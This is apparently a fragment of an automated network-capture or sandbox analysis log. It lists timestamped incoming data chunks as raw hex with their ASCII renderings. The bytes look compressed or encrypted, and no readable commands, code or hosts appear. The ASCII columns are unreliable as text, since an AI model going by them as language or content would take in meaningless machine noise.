                                                                                                                                                    2022-09-29 12:59:14 UTC24967INData Raw: d8 f4 c4 bc eb f8 9e 34 12 c8 40 fc ee 0a 28 46 5f 41 b5 17 bc 11 3c 4e f1 dd ee 91 e8 e1 52 81 80 87 5b 32 7d 9d 60 cb 32 a5 1d cd d3 7a ce 29 25 32 06 88 7c c7 4a f3 d6 5f 48 58 5a ee b8 b7 2c 32 52 c2 e9 66 bc df f9 50 b9 f2 84 4e 92 a0 b4 5b 46 ea 5e 68 b9 08 57 d8 5e 26 a5 0b af a6 f0 3e 81 ca 85 52 a1 bb 2f 94 2f 5b c7 87 2f 8c 87 ca 52 59 f1 15 75 a5 3a 3a bf 8d 05 d5 94 4d 2d b6 35 b4 dc 61 00 02 01 43 c2 9d 6b 9e ca b4 72 4c 2a 0e bb 6d 2c 6d 1a 9c b3 ba 02 98 cb 00 7a 80 40 dc 6f df 92 06 09 0a 8d f0 ee e6 e9 60 31 b7 73 8d 98 4b 99 48 bf 66 40 55 12 e0 3a a2 62 49 7d 0a cc 93 fd 23 92 ad 44 9d 37 d7 b5 1a 8b 01 b7 96 84 e2 06 8b 48 92 6a 36 fe 8c 9c ae d4 03 e0 68 bf 6f 71 39 f8 84 e7 ae 87 9a df 00 fc cb 8f 34 e9 f1 34 5b 33 98 e1 93 65 47 82
                                                                                                                                                    Data Ascii: 4@(F_A<NR[2}`2z)%2|J_HXZ,2RfPN[F^hW^&>R//[/RYu::M-5aCkrL*m,mz@o`1sKHf@U:bI}#D7Hj6hoq944[3eG
                                                                                                                                                    2022-09-29 12:59:14 UTC24983INData Raw: 4c 14 01 4a 7e 31 2c c2 90 ef 4d 4d 05 d9 8b 81 77 8b 37 83 22 33 9c 8c 96 19 ed 31 98 d9 a0 e6 a4 a6 cd 9b 3b 87 0c ce 2e ce 6c 86 cf b0 5d eb b5 a1 bc 75 f0 98 04 d8 ae 40 4b 19 53 33 81 74 99 80 b1 b7 32 6e a2 73 5c a2 7d cb 05 32 1a 52 dd 86 d7 5f c7 83 08 57 c5 04 a9 ae c1 51 38 de 78 13 37 6e 38 63 2e 58 13 16 70 fa 47 f3 55 b2 fe ad 1f 01 57 d9 65 53 5b d4 72 15 ab e5 42 11 14 ec eb e4 ad ec 4f b9 75 cc d4 17 b9 d4 5c 5e 18 84 13 19 80 5d 7e 42 82 59 9a c7 6f 1e 86 16 da 7a 5a 44 1b 25 b9 bc cf ae 61 d2 98 aa 61 21 5d 12 d3 28 d1 32 70 b6 aa 4f df 6b d5 a0 97 ba c2 b0 41 a1 63 0d 87 4a fb c8 9f 81 24 e2 a5 30 9f d6 d5 a9 87 9a f2 12 54 4d cd 28 10 5e 1f 63 95 f0 06 f1 6d e5 43 24 2a 3b aa 6c 2d 76 d4 ce 89 82 c9 a7 ba 49 7f 94 50 73 60 ff 11 2a 43
                                                                                                                                                    Data Ascii: LJ~1,MMw7"31;.l]u@KS3t2ns\}2R_WQ8x7n8c.XpGUWeS[rBOu\^]~BYozZD%aa!](2pOkAcJ$0TM(^cmC$*;l-vIPs`*C
                                                                                                                                                    2022-09-29 12:59:14 UTC24999INData Raw: f0 82 6b af 17 f9 f8 d1 8b 6c a5 21 24 5b ff 4e c6 4c 06 34 ab f6 d5 b1 85 42 54 74 83 5a e9 6f a9 ae 1a 4e 34 08 a9 17 d0 31 8a 3b 68 83 2a cb 3b 4b db ab 84 5a 94 ea 9a 5d d2 de 69 a5 c8 03 4c 5d fb a0 76 bb f9 5b ab 8a af 0a d3 43 c7 64 85 01 cb 36 aa 7d 18 18 9a fb 08 02 df 5a e3 64 5d 2b 30 15 0a 65 9c 40 92 02 c3 eb b0 3f 97 16 65 52 c0 b9 6c e2 7f 1d 49 27 ec 55 73 0b f8 e5 8c 6b 01 79 e3 84 eb 34 41 97 4e 42 c0 27 c2 f9 82 34 9a 76 35 f2 c5 c0 45 40 50 63 bb b8 db 54 b1 1a e4 6d de 7b 19 0d 96 f9 84 24 a4 2f 8c d7 36 7d 2f 47 1e 54 8b b9 d2 95 1a 23 8b d0 6b d2 4f 10 c8 08 56 87 a1 c6 da d6 e2 02 45 0e fd 9f c9 f4 79 24 d5 77 0b 27 8d 21 af 24 08 77 25 a3 53 89 e0 03 0a 4a 5b 51 dd 43 aa 3f 33 05 f2 95 3e 7e 41 53 86 9c 7b 1c 5f 9b a1 0f ad 79 7c
                                                                                                                                                    Data Ascii: kl!$[NL4BTtZoN41;h*;KZ]iL]v[Cd6}Zd]+0e@?eRlI'Usky4ANB'4v5E@PcTm{$/6}/GT#kOVEy$w'!$w%SJ[QC?3>~AS{_y|
                                                                                                                                                    2022-09-29 12:59:14 UTC25015INData Raw: 4b 41 10 69 28 96 62 b1 b4 f1 cc 8d 08 17 28 2a 18 b5 d9 c5 bc 52 c3 3e e5 0b 9d 92 39 a8 7c 70 55 f3 04 35 2c 0d 91 fe c4 3a 0d bf 75 f2 a9 19 d4 22 59 39 2f 50 4c c1 38 33 93 63 23 ac bb 6d 48 a4 08 1b 5b 0e ec a7 bb fb 1f 46 3d fc c7 f7 c2 ae d8 e7 f2 e7 ab ce 13 1b 14 0d cb 3e 36 52 32 4d b2 64 17 78 7e 44 a7 1b b7 35 7d dc ee 89 74 e0 10 5f 4f 80 17 2f 44 5c 87 7c 5d c9 8c 9b ff 4a 50 06 85 ee 7e 5e 16 0e 03 85 5b 97 4f 1b a6 b2 85 3d 75 12 88 37 af 84 ec 64 b8 1c 9e f4 4d be fd ab b2 42 b3 6c 75 88 26 06 36 f8 89 d1 6c ac 15 82 a3 4c fc 74 c3 4c 39 41 d1 94 17 00 da 62 25 92 8a 70 32 c9 f4 fb 1a 33 ae fd ae 1c 76 67 21 1d f1 16 ea 01 43 9c bf 43 78 05 01 56 4c 3f 63 01 2d 86 c2 d5 b1 53 c3 39 56 3b 8a f3 f8 a0 81 20 87 e8 02 19 e8 04 8f 7f 7f 8d 59
                                                                                                                                                    Data Ascii: KAi(b(*R>9|pU5,:u"Y9/PL83c#mH[F=>6R2Mdx~D5}t_O/D\|]JP~^[O=u7dMBlu&6lLtL9Ab%p23vg!CCxVL?c-S9V; Y
                                                                                                                                                    2022-09-29 12:59:14 UTC25031INData Raw: dc 80 50 18 98 ea 2e f8 7f 20 35 04 3a 42 7d 2e 6d 79 a8 f5 3c d2 d5 78 7c 77 05 06 6e 16 f3 9d 54 ac e0 c2 fa b0 5b c0 25 87 b4 17 a6 ef d5 73 9c 6f 6f 29 22 78 df 24 a8 99 43 22 91 a9 66 ed ff 0f 18 1c 3a fe 24 3d 90 02 30 65 82 f6 be 6a 7c a5 a9 1f 01 83 59 ee a2 6b 67 0e 5d 83 b2 7e 3f 54 a7 cc 9f 7a 8b 29 9e 27 96 9f 54 f0 39 33 a8 3e 9a 59 f3 34 fd 64 cb 48 63 84 4b 83 32 e4 e2 6a a4 b1 ca ac 96 36 3a e1 9d ab b9 e7 a1 02 54 6a a1 b5 d1 2f 09 46 66 bd d7 e2 9e 59 33 59 cf e5 4d 2c 70 81 df d0 28 fc 03 93 64 99 6b 88 e3 30 69 2c 7e 59 ee eb c7 f6 fc 09 97 13 8b cd 0f c7 ff a0 8b 46 7b 2f 99 ef f7 cb 61 ed 2f 42 db 25 27 bc 36 18 73 62 f7 90 58 f4 8c 6c 6c 01 8e a8 0d c7 c3 6a d0 d6 8d 97 61 e0 55 ba f4 51 6f 9a c3 ea 37 8d 0b 97 04 a6 14 10 4c 66 3b
                                                                                                                                                    Data Ascii: P. 5:B}.my<x|wnT[%soo)"x$C"f:$=0ej|Ykg]~?Tz)'T93>Y4dHcK2j6:Tj/FfY3YM,p(dk0i,~YF{/a/B%'6sbXlljaUQo7Lf;
                                                                                                                                                    2022-09-29 12:59:14 UTC25047INData Raw: 25 91 82 81 bf 46 77 ba ce f4 72 3f 6e 68 70 01 8f 5f 94 8c 3a bb e4 42 70 5a a0 b3 78 a0 c4 00 a6 3a fe 57 83 41 a9 61 a9 18 97 b3 03 af 9e 23 0d 84 ee b1 2a 05 e5 c2 0a b7 ae e2 e7 11 b7 d7 45 77 80 f9 d0 4c 7b ec b2 4f c0 fc 15 c3 39 e5 57 fc 09 1c 51 d2 d1 f3 3c ca d0 8c 1a bb 06 6e a5 92 c4 46 ad c5 1b 7d 3f eb 48 56 d5 35 eb 34 6d 47 21 10 74 dc b4 ef fe a1 df f1 63 8a 17 47 a8 fc cf a3 70 47 d3 36 c6 8d 80 b2 e5 1d 23 81 5d 41 6c 1e e6 65 01 ab 72 0c 0b 90 c0 ad 0c ef b8 d6 c6 b3 0f ff a1 6c 37 2f 78 8b fe 7b da c4 b2 7f 6e 76 70 5d a3 f0 cc 4f cd df f8 31 ec d6 bf 05 4e f9 d5 24 48 1a c7 7e dd 2a 4c cb 07 79 91 96 01 4a 74 43 12 6a b6 05 ae a8 77 81 51 01 ca 57 41 5e c2 ad f1 d1 b3 15 56 3b d6 97 91 9d 47 ee fe c0 fb a4 e7 0d 18 d2 ad 64 60 38 21
                                                                                                                                                    Data Ascii: %Fwr?nhp_:BpZx:WAa#*EwL{O9WQ<nF}?HV54mG!tcGpG6#]Alerl7/x{nvp]O1N$H~*LyJtCjwQWA^V;Gd`8!
                                                                                                                                                    2022-09-29 12:59:14 UTC25063INData Raw: 17 0e e0 0c 12 7a d6 8e 33 ec 3c 9d 0c a8 b6 c1 8f 82 d1 00 c2 eb 0f f1 cc 6e 8d 16 0b cc 2a 8f 37 5b 1d a7 2a 25 55 a8 67 33 af 56 7c 78 9e 22 bb 55 30 d7 78 4e 45 74 32 bf bf af ba 9c 0b f7 0e e5 33 35 10 4e 2c 2a 5d 34 8f ce 0e f6 38 2c bf 02 8c bb b2 01 35 6b 6a e7 b8 34 03 49 6b 8c 65 71 1d fd 87 93 17 04 8e fc 3d da 78 36 50 c9 90 38 ae 82 98 41 6f ab 43 03 9f 4a 2e 2e c0 04 ea 13 78 33 34 72 2f 90 38 ad 72 aa b6 f3 b8 7d a9 4a ad 98 66 93 bf e6 13 ed a7 39 71 6f 9e dd 06 79 ae 92 cf 44 55 b9 89 a0 7f 2d 1b 6f df c0 da 27 76 9c be b1 24 9c ba 2e 85 f7 c7 bc bc 64 f2 c8 28 f3 02 c2 fa 7a 1c db 6c be 7b 87 74 89 2a c7 74 a0 bc a9 c4 79 57 08 24 db 02 01 fc 0d e5 ee 0e af 68 b9 7b f5 33 8f 23 a8 82 c6 50 a3 79 3e 40 81 4b a5 f8 24 7c b0 6e da 1a 80 d3
                                                                                                                                                    Data Ascii: z3<n*7[*%Ug3V|x"U0xNEt235N,*]48,5kj4Ikeq=x6P8AoCJ..x34r/8r}Jf9qoyDU-o'v$.d(zl{t*tyW$h{3#Py>@K$|n
                                                                                                                                                    2022-09-29 12:59:14 UTC25079INData Raw: 32 82 40 07 05 56 60 1b 0c ce a9 20 82 24 eb cd 1d dd a5 c0 1d 58 bc b4 0d cb 1e 10 2a 04 45 e0 4c 41 9f 12 27 e6 1a 5f 79 53 fe 81 74 de ed 62 83 7e 7d 0e 0d b8 01 c9 5c e9 69 e3 63 b0 6d 4f 04 0b 13 83 51 b8 b5 14 5d 0e 96 fa ce 6a 40 fd 20 a3 8c 61 1d ac 27 3a 80 ad 88 27 7d 2e 2d 0f 39 ea da 0f a9 bc d4 63 46 17 4a 96 a5 bc 9c 97 e4 5d be 42 cf 5c 82 48 e3 4a 9c 33 3d d3 56 9b 53 17 ed 02 87 be 2f 64 9a 0c 42 55 ee d5 37 6c e3 2e 63 e4 f1 9f ee 04 26 6d 9c df 00 12 7f f2 70 74 6a f3 6d bf ec 4d e0 6a df 8a 7b 48 bc 89 f6 1b d8 6f e7 57 06 1c 17 da ec 3e 14 f3 ff a8 a0 26 f1 a9 9a 43 ed 62 dc bf f4 8d 20 97 87 5a 33 be e6 d8 9a 75 b8 6c 9a 8b 5a e2 29 44 19 1c 93 12 41 2f 73 57 05 4b 8d b0 cb 5a ef ef 1b 47 7d 8e 93 0e 47 da c6 4b e7 7c a1 59 73 b3 0a
                                                                                                                                                    Data Ascii: 2@V` $X*ELA'_yStb~}\icmOQ]j@ a':'}.-9cFJ]B\HJ3=VS/dBU7l.c&mptjmMj{HoW>&Cb Z3ulZ)DA/sWKZG}GK|Ys
                                                                                                                                                    2022-09-29 12:59:14 UTC25095INData Raw: 6e 1a 7d ba 8c b5 c6 0e 60 3b a2 c0 36 1f 5b f1 b0 c7 57 6b df 8d 5f 10 f7 8f 91 6e fc a3 b0 83 09 c8 f5 eb 07 97 57 4a 0d cf fa 9f f4 f5 18 7b 2c 6d cf 17 65 77 8a 63 b3 01 b9 bc 33 08 a8 81 c7 ac f9 6b 2d f4 7d 42 de ff ac ea 38 f8 cb 50 a9 4b 89 e4 53 3d a9 97 6f 13 26 6e 1b be 64 9a fd f6 cd 25 9f 7e b1 10 ca f0 54 17 eb 17 52 71 73 91 ae d7 6d f9 54 53 14 2d 95 48 c6 66 12 72 7e e8 77 6c 6d 6e a8 37 4b be 01 e8 13 27 0f 8b f0 db ab 39 01 f4 ab 7c 96 05 24 97 72 a2 6c a9 19 f4 11 77 20 0e 58 5a 99 bb 47 61 6c 6d 39 0c ce ee 3b 00 58 41 65 7f d9 af 90 b9 13 51 14 59 0b 35 82 26 70 e6 aa 9e 1d 5d ac 2b be 03 8b 71 60 8a 56 7d c2 8a 16 c2 23 c6 92 74 a7 aa 52 11 4d 53 71 07 49 76 7a f2 b9 de 9a d6 1d 89 8b 74 8c 66 57 50 f4 b7 ad 98 10 7c f2 52 ab 17 a0
                                                                                                                                                    Data Ascii: n}`;6[Wk_nWJ{,mewc3k-}B8PKS=o&nd%~TRqsmTS-Hfr~wlmn7K'9|$rlw XZGalm9;XAeQY5&p]+q`V}#tRMSqIvztfWP|R
                                                                                                                                                    2022-09-29 12:59:14 UTC25111INData Raw: 8a 21 09 c4 b6 93 f2 a2 89 00 72 6e 86 a9 37 00 09 95 f1 15 1f d5 c1 a3 dd 1a a9 52 72 1f 57 4c cc 8c 82 06 15 e8 b2 e5 2d bd ac 3f e6 d8 99 02 1d d2 aa ee 46 2c f9 0a a6 3a a9 28 15 15 3d 46 3b fb 47 ee 27 4d f0 f9 94 28 87 8f 04 40 c0 eb c7 97 4b 35 47 08 96 3a 19 47 5b d8 be 33 98 70 b2 e1 b2 06 ad 94 e3 9b 0a 62 39 2d e4 f3 b6 6f aa f7 28 4b 4b ed c1 5e 25 fa 00 26 7f 21 17 a3 a2 fe e3 08 6f f2 a8 02 e2 77 b5 55 52 73 4d 80 7b 3f 0b 06 0b 14 cf 9d a4 83 7a c7 62 b7 89 05 94 9d 04 8c db 4d 5d 6e ac fe 29 c7 60 a2 f1 a3 cf f4 91 6a 1b ff 3e b5 88 1f 95 27 9e ca 82 f3 c1 5a c9 6b 2b aa 24 c3 10 c3 f8 e8 6d 6b 8e 43 e9 3f 07 4c 1f 7e 84 53 af 96 93 64 d3 78 98 41 ab 46 aa fe 0c 46 29 f7 3b 29 9b 19 5a 4b 08 73 1e 11 57 0f 67 2e fa 7f 97 46 0d 09 77 1e 29
                                                                                                                                                    Data Ascii: !rn7RrWL-?F,:(=F;G'M(@K5G:G[3pb9-o(KK^%&!owURsM{?zbM]n)`j>'Zk+$mkC?L~SdxAFF);)ZKsWg.Fw)
                                                                                                                                                    2022-09-29 12:59:14 UTC25127INData Raw: a1 fc f5 21 52 d1 70 c4 90 21 b4 35 ae f8 a0 2d 4e 8d d8 72 9b 22 49 08 9a 54 75 8f ef 8a 8c 68 c7 9f 3f 4b fa 98 70 e0 16 31 3e 18 11 20 a7 ca 6e d5 f8 94 37 e0 15 ed 47 2f f2 b5 58 86 06 ce 49 f0 2a 69 b0 bb f2 9b 1b 66 d6 44 92 b0 01 cd cc 02 6f ad a8 9d 3b 29 39 ff 53 00 93 81 71 20 65 65 d2 97 44 32 73 f7 16 f6 0e 2f 0d 2f ae 19 0a ef 4c f1 1e 9b 90 5f dd 9c fc 45 63 19 f5 f5 3a 46 0f 5b 28 3c a2 16 ba bc e8 92 85 1f 13 02 a3 39 98 35 70 c6 9a 26 b3 99 8d 72 f7 a9 99 32 a7 58 e6 64 4f 02 9e 64 59 18 60 69 fb 72 31 c6 24 b1 61 5b 01 f2 41 4f f6 d9 4e 35 16 a6 8f a4 27 fc 2e fe 66 06 73 75 9d e7 a0 ac 39 78 b9 47 63 2f 81 b7 63 42 45 d8 4e 4c 07 b2 ac f1 d7 4d 24 4e 0f c0 31 ad 85 80 e5 6e 4a 89 45 d4 00 7b cc 0b 15 5f 1f 10 a1 1c 8f 2c b4 3f 87 25 6f
                                                                                                                                                    Data Ascii: !Rp!5-Nr"ITuh?Kp1> n7G/XI*ifDo;)9Sq eeD2s//L_Ec:F[(<95p&r2XdOdY`ir1$a[AON5'.fsu9xGc/cBENLM$N1nJE{_,?%o
                                                                                                                                                    2022-09-29 12:59:14 UTC25143INData Raw: e7 9d 16 65 29 f0 c6 8d 4e 4b c9 34 b5 38 44 f3 bf cb f3 78 7d a8 b6 b8 f3 82 4e c8 ee c4 21 4d e6 83 4b 05 b2 f6 93 dd d7 c0 95 e1 0c 69 19 10 a9 ba fc b6 c4 60 e2 25 95 5b 60 c1 2d 9b e8 ec 62 f9 b6 db ca 6c 27 d1 52 96 2c 6a bd 28 aa ad 96 d1 44 9e 11 1f 05 f7 81 68 50 1a be 37 80 71 d6 98 83 73 9b dd b4 45 01 8e f2 48 91 d4 ce 8e c9 c5 f2 63 96 0a 59 e3 fc ef 2b 32 26 e7 22 55 35 3a cb a1 4e 1a a2 c5 7a 15 ca 30 e5 66 95 9a a0 82 29 2e 78 7a ab 02 50 87 7b 9b e8 eb dc 44 02 ee 49 2d 33 64 64 72 0b 51 ce be 0c 24 cb 52 c5 e0 6c 95 9f 12 61 14 57 1a dc 9b 3a 7c 40 21 f8 95 94 ea 12 e8 03 e8 be af 65 35 3e 8d 8d 23 af 7d 62 96 2f dc 6d ad 66 ea e8 c6 89 6b 2c 57 fb ad 4b a4 24 5d 20 90 34 3f 42 c9 b4 b0 a4 60 a1 50 b2 be 83 d2 e7 80 36 36 07 77 ac b0 91
                                                                                                                                                    Data Ascii: e)NK48Dx}N!MKi`%[`-bl'R,j(DhP7qsEHcY+2&"U5:Nz0f).xzP{DI-3ddrQ$RlaW:|@!e5>#}b/mfk,WK$] 4?B`P66w
                                                                                                                                                    2022-09-29 12:59:14 UTC25159INData Raw: 3f 3d 8b 7a 09 9e 93 3a 7b 76 7e 0d 4f dd 22 1e 5f 99 9d 94 50 70 46 ad da 2d 4c 76 35 c4 08 11 44 21 66 31 3e d0 52 2d c5 29 90 74 68 3e 10 e8 05 ab 26 05 ea 32 5e ab d4 23 56 68 ec 14 80 84 e1 5b 21 82 71 e1 2b f0 56 38 2c c6 29 d3 e2 ac e9 f7 cd f9 4f 19 eb 9e 9b af f7 f5 40 7c 21 07 9e 9a 59 f4 f7 dd 4b 6d fa bf db 36 77 33 b7 1a bd 01 be b1 be 29 43 3d 1f 6e 6c 88 65 2e 2b 13 ef 48 30 ef f1 28 4d 25 b8 a9 64 11 21 68 09 69 9d 63 e0 55 c8 fd 0b 21 0e 4b b7 34 d8 55 f3 61 11 19 44 df ee ba 0b 87 41 51 7b cd e6 1b 7a c6 e6 ec 53 96 6d 8b 99 14 d2 ea c7 d9 de 95 f2 fe cb 48 a6 c6 a4 6c a6 63 e6 80 82 cc 57 1b 22 57 cd 56 1c 10 3b 89 b7 92 ad 57 05 24 df 38 ba bb 5e 9d 49 5f 62 43 2e 8c 85 c0 7a 91 2f df ad 8e 74 8d e5 d0 dd e6 27 56 1e 28 e4 9a d5 dd c5
                                                                                                                                                    Data Ascii: ?=z:{v~O"_PpF-Lv5D!f1>R-)th>&2^#Vh[!q+V8,)O@|!YKm6w3)C=nle.+H0(M%d!hicU!K4UaDAQ{zSmHlcW"WV;W$8^I_bC.z/t'V(
                                                                                                                                                    2022-09-29 12:59:14 UTC25175INData Raw: fc 10 c0 c8 3d 3b 75 c2 34 83 fd 8a d8 ce 4f 60 43 d7 3f 2a 62 2b 51 ea 14 69 eb 16 32 ed 45 56 a2 c2 dd 8f 0a 5e 0b e9 17 e9 08 de 58 50 77 a2 47 23 ef 70 dd e2 5d c0 de 73 0f 50 0b a1 5f 0b 05 d8 48 6a 5e 32 d8 ef 33 c0 1b 74 79 8c 93 bc 5c e3 4a a0 19 f2 7a 7d 87 13 3a 67 43 11 2c e1 f0 33 e3 7f 6a a8 3e 3a 63 88 32 2c d8 19 d2 fa 5a c8 d7 9c 6a 81 71 ac 7e b6 d9 5a 7b 6f 87 88 dd 3f 9b 37 99 35 52 83 cf 22 a4 c1 68 b7 79 8a 93 a8 0a 25 94 9e 27 f5 b2 10 36 64 62 38 28 68 f5 3a dd 68 5a 50 52 a7 30 f2 af 42 bf 26 75 5b 8a 8e bf b1 65 4c c4 2d 3a 03 0d 8d 2b 29 0f 04 34 ec e2 30 9e 2e 2f a3 ad 46 9b a8 85 a8 23 1f b3 76 37 f2 ce 51 1c a4 c4 62 be e1 67 f6 c6 b8 11 c6 91 d0 7e 9a ba cb 46 12 0b 39 8e da 28 2b 09 04 3d f6 0e 0b 93 9f 6e f3 b8 9e f9 19 f2
                                                                                                                                                    Data Ascii: =;u4O`C?*b+Qi2EV^XPwG#p]sP_Hj^23ty\Jz}:gC,3j>:c2,Zjq~Z{o?75R"hy%'6db8(h:hZPR0B&u[eL-:+)40./F#v7Qbg~F9(+=n
                                                                                                                                                    2022-09-29 12:59:14 UTC25191INData Raw: 8c ad 94 93 0d e8 80 4f 9f c0 71 87 6e e1 6d b8 23 ac da 32 8d 81 b1 68 7f 50 5e b0 b9 e7 3e f4 1d 60 3d 6c 97 9b 64 96 7b 54 c9 f6 3b a2 3a 8c d1 7d cc 6e 5c e9 0c 4e 8c 93 63 82 06 a0 cd 6a c1 fb 0f ae 79 72 bd 71 77 b9 96 ea aa b9 05 69 d0 01 cc 05 6f 38 77 27 89 fa 69 e5 e3 3b dd 7a 86 26 b7 e2 e4 d8 78 ff e1 f6 19 fb e0 3a 11 bd 14 2f 58 5b b7 11 75 3e 40 e6 89 55 2e 88 b8 07 81 e8 e5 b2 98 1b 6b c0 4f fa 44 28 dc 18 8d d2 42 4c 79 57 44 84 d8 85 bc 12 72 a0 34 99 1a ab 4f b5 25 86 46 c4 dc c4 8c 46 5c ae 0a e5 7d 50 12 5b ad a3 9c 5f 59 d8 45 03 f7 d9 44 0c 99 00 79 0d d1 d1 0e 21 82 49 4b 3e 98 76 94 5d 38 4d b3 26 7d 9c c3 03 ed 61 84 2e de d0 ff fb c3 df 9a 84 e2 8c 78 d7 3e 55 06 40 94 bd 5e 38 80 db 2b 57 e0 80 0c 9c 2c b4 5a dc 2d 0f 82 da bc
                                                                                                                                                    Data Ascii: Oqnm#2hP^>`=ld{T;:}n\Ncjyrqwio8w'i;z&x:/X[u>@U.kOD(BLyWDr4O%FF\}P[_YEDy!IK>v]8M&}a.x>U@^8+W,Z-
                                                                                                                                                    2022-09-29 12:59:14 UTC25207INData Raw: ba 4d cd 05 e7 fa 94 d1 09 99 fb a3 1c 68 9f c3 5b 00 00 81 e8 0f 77 6e a7 fe 5c 81 3c aa 11 2f ea f9 a9 d8 31 2c 03 e2 47 4b a6 a8 6f 44 bf 46 a8 41 89 1b 0a ab cf 08 ae a6 92 3c c6 1d 47 f5 4c 85 14 3d b6 26 15 7b 5e 5a 41 c6 27 9b 4f b5 ba f6 8c da 86 f5 3f 33 2b 46 5e 30 6a 6e 50 28 d0 7e 70 6a 69 c8 ce b9 82 e5 56 5c 55 10 5f 80 53 d8 44 69 7e 8c 51 43 64 cb 01 c0 55 de 7b 35 a2 1f 07 b3 6c b0 41 e8 4d ed e7 c6 16 8a c4 39 32 9e ae e3 59 12 77 0d 8b 41 79 5b 48 8b 9e 6a 1b 79 fb 55 b1 99 74 43 70 d5 38 99 b6 87 03 b9 d3 d5 8a 47 17 07 12 8a a3 5c a5 73 2c 5d 3b 70 fb b0 a7 d4 ca 1a a9 d2 3b d7 d9 30 2f 65 31 36 7e 87 05 dd 83 c0 a2 58 87 1e d8 10 40 fc 50 b2 99 bd 8b 0f cb d3 ae 24 7c 9c 64 6f d6 b2 c5 40 dd 94 a5 6d 9d 72 2c 41 98 7c 2d a2 41 ed fc
                                                                                                                                                    Data Ascii: Mh[wn\</1,GKoDFA<GL=&{^ZA'O?3+F^0jnP(~pjiV\U_SDi~QCdU{5lAM92YwAy[HjyUtCp8G\s,];p;0/e16~X@P$|do@mr,A|-A
                                                                                                                                                    2022-09-29 12:59:14 UTC25223INData Raw: 12 a8 30 c4 15 87 44 40 fe d3 be 1a 7d 85 7f 04 0d fc b2 95 19 fc ee 19 8e f3 54 ee 0a 21 d0 49 27 7c 0e 90 77 38 69 34 c5 3f 74 0b 5f c9 ee db b8 33 10 9b 3f 4f e3 65 16 da c0 e0 48 6a 58 cc 2f 05 11 ee 71 ee 99 b3 96 7b 7a 9d 63 ce ae 3c 11 38 93 58 b7 42 2d 60 11 2f 0a af da 2e 32 3c dd 44 e0 8b 37 e4 3e e8 44 bf e1 22 73 67 20 aa c9 94 a1 79 86 1a 55 bd 7a 47 52 94 60 08 29 9e eb 7a 69 71 70 73 39 06 2a e0 e4 17 08 fd 20 3d ad 28 e6 2c 19 12 73 96 c4 d2 5a b0 12 4d 04 73 c3 9d ff 01 c9 08 06 44 c9 09 0b 7a 8a d1 ab 54 f4 6a f1 ef fe f1 79 94 ff f2 65 e5 27 39 7b 9f e5 ef bc 95 5a ce 10 59 05 96 f1 f4 8e 9a 05 9a 3b d2 1c 38 5a ad 74 a7 3d 14 1f 69 aa e8 14 c0 86 99 28 d1 ec 53 c5 58 ea e9 a7 f9 8d 51 ca c4 cf b5 d1 bf 11 71 1b fc bf c2 80 9c 47 63 1d
                                                                                                                                                    Data Ascii: 0D@}T!I'|w8i4?t_3?OeHjX/q{zc<8XB-`/.2<D7>D"sg yUzGR`)ziqps9* =(,sZMsDzTjye'9{ZY;8Zt=i(SXQqGc
                                                                                                                                                    2022-09-29 12:59:14 UTC25239INData Raw: 5e 5d 1a 1f ab b8 04 11 9b 04 85 c7 53 94 04 ad 96 28 ef 55 a0 5d 58 6a d3 3f df 5b d4 1d 62 ab 6d eb b0 7b f1 cf e3 e5 43 4b 47 ba 70 39 3c fc 23 7c f8 e7 f5 36 2d 88 dc 7c 68 c3 72 12 a5 f4 51 37 0f 65 cd 30 5a 38 8e 83 d1 38 e6 18 b0 84 4d 8c 01 e1 82 fb 66 25 5a 30 1c 83 62 34 65 75 f3 2c b3 8b 25 77 27 f7 8d 29 28 e3 99 9f 9b a4 87 9d ee 3f 9e 26 4a 23 9e 61 d8 89 b4 9d 86 34 32 55 4c 32 f2 80 52 06 a8 ca 5e c0 40 bb bd b3 a7 15 10 18 9d 75 b7 94 e3 c2 d3 47 19 79 4d 23 7d d1 c2 58 eb b3 48 a3 87 75 c2 bb 38 97 0a 77 45 82 23 88 67 a1 67 93 8b 4a 76 b1 3c 21 3d a8 97 5e 33 4d 80 5d 56 49 28 ec c3 e0 e3 38 68 d0 d7 de f8 f2 1a e9 22 5a dd 9d dc c0 b9 ef 59 b7 3b 65 96 63 cf ba 2b 9c 63 3c 6a db b4 08 42 6c 7e 58 ea 23 1e 35 8e 2a 41 79 92 5a f6 09 5e
                                                                                                                                                    Data Ascii: ^]S(U]Xj?[bm{CKGp9<#|6-|hrQ7e0Z88Mf%Z0b4eu,%w')(?&J#a42UL2R^@uGyM#}XHu8wE#ggJv<!=^3M]VI(8h"ZY;ec+c<jBl~X#5*AyZ^
                                                                                                                                                    2022-09-29 12:59:14 UTC25255INData Raw: 74 bc ee 1f ed d2 55 72 e9 14 91 b3 d7 e3 c4 4c e6 5b 8f 3e 4c 1b 8c ba 08 9a 4c 8a c1 ee 3c c5 6c 92 3d 34 94 8c f4 05 cf c2 8d 25 e5 3d f6 7e 9d 4e d2 f0 96 e2 65 b7 c2 56 2e 09 43 66 98 40 fc e9 50 96 0d 02 ea de 8c ac b1 51 96 b3 37 54 fb 30 d0 12 54 b1 2f 0b 8e 82 3a 84 4c 22 51 5c 3d d8 ac 54 b5 a3 62 34 12 2a ce 59 82 fe 43 5c 1a b8 68 ea 3c 32 9a 79 99 b9 28 b1 49 75 11 0d 8b e9 42 be c6 b5 d1 b0 a4 22 25 f5 a7 9c 9b 13 59 bf 62 81 2d da 9f ab 66 6d 8d f8 93 30 f5 74 56 34 6a 89 2c 6a 85 e7 82 ab 02 5c 11 a6 1a 18 3c ae 85 ff a5 92 ed 1c ba eb 50 bf bc 92 ed ed fc 38 04 ee 85 8e 20 0f 2e 26 7c 8e 2a 4f fe cc 35 c8 0e a2 bc 0d 48 40 f5 29 33 8a 54 32 3f 78 d9 a7 b4 85 ba 9a 1b b0 15 11 47 d4 3c 43 d6 25 f3 18 89 83 26 c7 31 d3 43 c7 b4 c5 bb d1 5c
                                                                                                                                                    Data Ascii: tUrL[>LL<l=4%=~NeV.Cf@PQ7T0T/:L"Q\=Tb4*YC\h<2y(IuB"%Yb-fm0tV4j,j\<P8 .&|*O5H@)3T2?xG<C%&1C\
